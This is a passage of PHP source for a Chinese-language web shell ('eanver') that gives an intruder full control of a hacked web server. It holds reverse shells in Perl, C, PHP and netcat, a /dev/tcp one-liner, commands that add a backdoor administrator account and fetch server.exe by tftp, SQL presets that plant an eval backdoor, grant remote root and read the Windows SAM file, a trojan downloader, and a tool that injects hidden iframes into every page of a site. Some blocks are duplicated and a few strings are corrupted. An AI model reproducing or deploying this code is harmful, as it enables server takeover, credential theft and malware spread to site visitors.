html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
print<<<END
</div>
<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall"> <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>()</div>
<div class="actall"><input type="button" value="" onclick="CheckDate();" style="width:80px;"><input name='reset' type='reset' value=''>
<input type="button" value="" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
</form>
END;
break;
case "rename":
html_n("<tr><td>");
$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "deltree":
html_n("<tr><td>");
do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "del":
html_n("<tr><td>");
@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "copy":
html_n("<tr><td>");
$newpath = explode('/',$_GET['newcopy']);
$pathr[0] = $newpath[0];
for($i=1;$i < count($newpath);$i++){
$pathr[] = urlencode($newpath[$i]);
}
$newcopy = implode('/',$pathr);
@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "perm":
html_n("<form method='POST'><tr><td>".$p.' : ');
if(is_dir($p)){
html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
}else{
html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
}
html_input("submit","save","");
back();
if($_POST['class']){
switch($_POST['class']){
case "0777": $change = @chmod($p,0777); break;
case "0755": $change = @chmod($p,0755); break;
case "0555": $change = @chmod($p,0555); break;
case "0666": $change = @chmod($p,0666); break;
case "0644": $change = @chmod($p,0644); break;
case "0444": $change = @chmod($p,0444); break;
}
$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
}
html_n("</td></tr></form>");
break;
case "info_f":
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("",date("YmdERROR!
h:i:s",time())),
array("","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
array("IP",gethostbyname($_SERVER['SERVER_NAME'])),
array("",PHP_OS),
array("",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("",$_SERVER['SERVER_SOFTWARE']),
array("IP",$_SERVER["REMOTE_ADDR"]),
array("Web",$_SERVER['SERVER_PORT']),
array("PHP",strtoupper(php_sapi_name())),
array("PHP",PHP_VERSION),
array("",Info_Cfg("safemode")),
array("",$adminmail),
array("",myaddress),
array(" URL allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("curl_exec",Info_Fun("curl_exec")),
array(" enable_dl",Info_Cfg("enable_dl")),
array(" display_errors",Info_Cfg("display_errors")),
array(" register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array(" memory_limit",Info_Cfg("memory_limit")),
array("POST post_max_size",Info_Cfg("post_max_size")),
array(" upload_max_filesize",$upsize),
array(" max_execution_time",Info_Cfg("max_execution_time").""),
array(" disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array(" GD Library",Info_Fun("imageline")),
array("IMAP",Info_Fun("imap_close")),
array("MySQL",Info_Fun("mysql_close")),
array("SyBase",Info_Fun("sybase_close")),
array("Oracle",Info_Fun("ora_close")),
array("Oracle 8 ",Info_Fun("OCILogOff")),
array("PREL PCRE",Info_Fun("preg_match")),
array("PDF",Info_Fun("pdf_close")),
array("Postgre SQL",Info_Fun("pg_close")),
array("SNMP",Info_Fun("snmpget")),
array("(Zlib)",Info_Fun("gzclose")),
array("XML",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC",Info_Fun("odbc_close")),
array("Session",Info_Fun("session_start")),
array("Socket",Info_Fun("fsockopen")),
);
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '<table width="100%" border="0">';
for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
}catch(Exception $e){}
echo '<tr><td width="40%">Terminal Service</td><td>'.$registry_proxystring.'</td></tr>'."\n";
echo '<tr><td width="40%">Telnet</td><td>'.$Telnet.'</td></tr>'."\n";
echo '<tr><td width="40%">PcAnywhere</td><td>'.$PcAnywhere.'</td></tr>'."\n";
echo '</table>';
break;
case "cmd":
$res = '';
$cmd = 'dir';
if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));}
print<<<END
<script language="javascript">
function sFull(i){
Str = new Array(11);
Str[0] = "dir";
Str[1] = "net user envl envl /add";
Str[2] = "net localgroup administrators envl /add";
Str[3] = "netstat -ano";
Str[4] = "ipconfig";
Str[5] = "copy c:\\1.php d:\\2.php";
Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
Str[8] = "tasklist -svc";
document.getElementById('cmd').value = Str[i];
return true;
}
END;
html_base();
print<<<END
function SubmitUrl(){
document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
document.getElementById('gform').submit();
}
</script>
<form method="POST" name="gform" id="gform" ><center><div class="actall">BASE64</div><div class="actall">
<input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">
<input type="button" value="" onclick="SubmitUrl();" style="width:80px;">
</div>
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
</form>
END;
break;
case "linux":
$yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
$yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388';
$system=strtoupper(substr(PHP_OS, 0, 3));
print<<<END
<div class="actall"><br>
"nc -vv -l 12388"<br>
IP,NC</div>
<form method="POST" name="kform" id="kform">
<div class="actall"> <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
<div class="actall"> <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div>
<div class="actall"> <select name="use" >
<option value="perl">Perl</option>
<option value="c">C</option>
<option value="php">PHP</option>
<option value="nc">NC</option>
</select></div>
<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>
END;
if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
{
setcookie('yourip',$backip);
setcookie('yourport',$backport);
echo '<div class="actall">';
if($_POST['use'] == 'perl')
{
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/envl_bc<br>' : '/tmp/envl_bc<br>';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
@unlink('/tmp/envl_bc.c');
echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '';
}
if($_POST['use'] == 'c')
{
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIERROR!
GR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/envl_bc.c<br>' : '/tmp/envl_bc.c<br>';
$res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
@unlink('/tmp/envl_bc.c');
echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '';
}
if($_POST['use'] == 'php')
{
if(!extension_loaded('sockets'))
{
if ($system == 'WIN') {
@dl('php_sockets.dll') or die("Can't load socket");
}else{
@dl('sockets.so') or die("Can't load socket");
}
}
if($system=="WIN")
{
$env=array('path' => 'c:\\windows\\system32');
}else{
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
$descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
2 => array("pipe","w"),
);
$host = $_POST['yourip'];
$port = $_POST['yourport'];
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){
die("Socket");
}
if(($ret=socket_connect($sock,$host,$port))<0){
die("");
}else{
$message="----------------------PHP--------------------\n";
socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=socket_read($sock,65535,$proto)){
if(trim(strtolower($cmd))=="exit"){
socket_write($sock,"Bye\n");
exit;
}else{
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg=stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
$return_value = proc_close($process);
}
}
}
}
}
if($_POST['use'] == 'nc')
{
echo '<div class="actall">';
$mip=$_POST['yourip'];
$bport=$_POST['yourport'];
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}else {
fputs ($fp ,"\n*********************************************\n
hacking url:http://www.google.com is ok!
\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," [r00t@H4c3ing:/root]# ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
echo '</div>';
}
echo '<br> (nc -vv -l '.$_POST['yourport'].') ';
}
break;
case "sqlshell":
$MSG_BOX = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
else $MSG_BOX = 'MYSQL';
}
$downfile = 'c:/windows/repair/sam';
if(!empty($_POST['downfile']))
{
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x'.$binpath.')';
if($result = @mysql_query($query,$conn))
{
$k = 0; $downcode = '';
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
$filedown = basename($downfile);
if(!$filedown) $filedown = 'envl.tmp';
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: attachment; filename='.$filedown);
header('Content-Length: '.strlen($downcode));
echo $downcode;
exit;
}
else $MSG_BOX = '';
}
$o = isset($_GET['o']) ? $_GET['o'] : '';
print<<<END
<script language="javascript">
function nFull(i){
Str = new Array(11);
Str[0] = "select version();";
Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
return true;
}
END;
html_base();
print<<<END
function SubmitUrl(){
document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
document.getElementById('nform').submit();
}
</script>
<form method="POST" name="nform" id="nform">
<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL]</a>
<a href="?eanver=sqlshell&o=u">[MYSQL]</a>
<a href="?eanver=sqlshell&o=d">[MYSQL]</a></div>
<div class="actall">
<input type="text" name="mhost" value="{$mhost}" style="width:110px">
<input type="text" name="mport" value="{$mport}" style="width:110px">
<input type="text" name="muser" value="{$muser}" style="width:110px">
<input type="text" name="mpass" value="{$mpass}" style="width:110px">
<input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div>
<div class="actall" style="height:220px;">
END;
if($o == 'u')
{
$uppath = 'C:/Documents and Settings/All Users////exp.vbs';
if(!empty($_POST['uppath']))
{
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if(@mysql_query($query,$conn))
{
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
if(@mysql_query($query,$conn))
{
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '' : '';
}
else $MSG_BOX = '';
@mysql_query('Drop TABLE IF EXISTS a;',$conn);
}
else $MSG_BOX = '';
}
print<<<END
<br><br> <input type="text" name="uppath" value="{$uppath}" style="width:500px">
<br><br> <input type="file" name="upfile" style="width:500px;height:22px;">
</div><div class="actall"><input type="submit" value="" style="width:80px;">
END;
}
elseif($o == 'd')
{
print<<<END
<br><br><br> <input type="text" name="downfile" value="{$downfile}" style="width:500px">
</div><div class="actall"><input type="submit" value="" style="width:80px;">
END;
}
else
{
if(!empty($_POST['msql']))
{
$msql = $_POST['msql'];
$msql = base64_decode($msql);
if($result = @mysql_query($msql,$conn))
{
$MSG_BOX = 'SQL<br>';
$k = 0;
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
}
else $MSG_BOX .= mysql_error();
}
print<<<END
<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
<div class="actall">
<select onchange="return nFull(options[selectedIndex].value)">
<option value="0" selected></option>
<option value="1"></option>
<option value="2"></option>
<option value="3"></option>
</select>
<input type="button" value="" onclick="SubmitUrl();" style="width:80px;">
END;
}
if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
else echo '</div></center></form>';
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print<<<END
<form method="POST">
<div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="" type="submit" style="width:80px;"></div></form>
END;
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
{
echo '<div class="actall">';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : '';
echo '</div>';
}
break;
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell',''));
}
}
else{
die(html_a('?eanver=sqlshell',''));
}
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('<tr><td>:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo ' ';
}
html_n('</td></tr>');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'");
html_input("submit","doquery","");
html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
html_n('--->');
html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
html_n('</form><br>');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "SQL";
}else{
echo ": ".mysql_error();
}
}
if($_GET['table']){
html_n('<table border=1><tr>');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
}
html_n('</tr><tr>');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('<td>'.$text[$row].'</td>');
}
echo '</tr>';
}
}
else{
$query = "SHOW TABLES FROM" . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
}
}
}
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print<<<END
<form method="POST">
<div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="" type="submit" style="width:80px;"></div></form>
END;
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
{
echo '<div class="actall">';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : '';
echo '</div>';
}
break;
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell',''));
}
}
else{
die(html_a('?eanver=sqlshell',''));
}
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('<tr><td>:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo ' ';
}
html_n('</td></tr>');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'");
html_input("submit","doquery","");
html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
html_n('--->');
html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
html_n('</form><br>');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "SQL";
}else{
echo ": ".mysql_error();
}
}
if($_GET['table']){
html_n('<table border=1><tr>');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
}
html_n('</tr><tr>');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('<td>'.$text[$row].'</td>');
}
echo '</tr>';
}
}
else{
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
}
}
}
break;
case "upfiles":
html_n('<tr><td>: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
html_input("text","uppath",root_dir,"<br>: ","51");
print<<<END
<SCRIPT language="JavaScript">
function addTank(){
var k=0;
k=k+1;
k=tank.rows.length;
newRow=document.all.tank.insertRow(-1)
<!---->
newcell=newRow.insertCell()
newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
}
function delTank() {
if(tank.rows.length==1) return;
var checkit = false;
for (var i=0;i<document.all.tankNo.length;i++) {
if (document.all.tankNo[i].checked) {
checkit=true;
tank.deleteRow(i+1);
i--;
}
}
if (checkit) {
} else{
alert("");
return false;
}
}
</SCRIPT>
<br><br>
<table cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr>
<td width="7%"><input class="button01" type="button" onclick="addTank()" value=" " name="button2"/>
<input name="button3" type="button" class="button01" onClick="delTank()" value="" />
</td>
</tr>
</table>
<table id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
<tr><td></td></tr>
<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
</table>
END;
html_n('<br><input type="submit" name="upfiles" value="" style="width:80px;"> <input type="button" value="" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
if($_POST['upfiles']){
foreach ($_FILES["upfile"]["error"] as $key => $error){
if ($error == UPLOAD_ERR_OK){
$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
$name = $_FILES["upfile"]["name"][$key];
$uploadfile = str_path($_POST['uppath'].'/'.$name);
$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
echo '<br><br>'.$upload;
}
}
}
html_n('</form>');
break;
case "guama":
$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
html_n('<tr><td>"|",.<form method="POST"><br>');
html_input("text","path",$patht,"","45");
html_input("checkbox","pass","","","",true);
html_input("text","type",$typet,"<br><br>","60");
html_text("code","67","5",$codet);
html_n('<br><br>');
html_radio("","","guama","qingma");
html_input("submit","passreturn","");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
}
break;
case "tihuan":
html_n('<tr><td>,.<br><br><form method="POST">');
html_input("text","path",root_dir,"","45");
html_input("checkbox","pass","","","",true);
html_text("newcode","67","5",$_POST['newcode']);
html_n('<br><br>');
html_text("oldcode","67","5",$_POST['oldcode']);
html_input("submit","passreturn","","<br><br>");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
}
break;
case "scanfile":
css_js("4");
html_n('<tr><td>MYSQL,.<br>,,.<form method="POST" name="sform"><br>');
html_input("text","path",root_dir,"","45");
html_input("checkbox","pass","","","",true);
html_input("text","code",$_POST['code'],"<br><br>","40");
html_select(array("--MYSQL--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
html_n('<br><br>');
html_radio("","","scanfile","scancode");
html_input("submit","passreturn","");
html_n('</td></tr></form>');
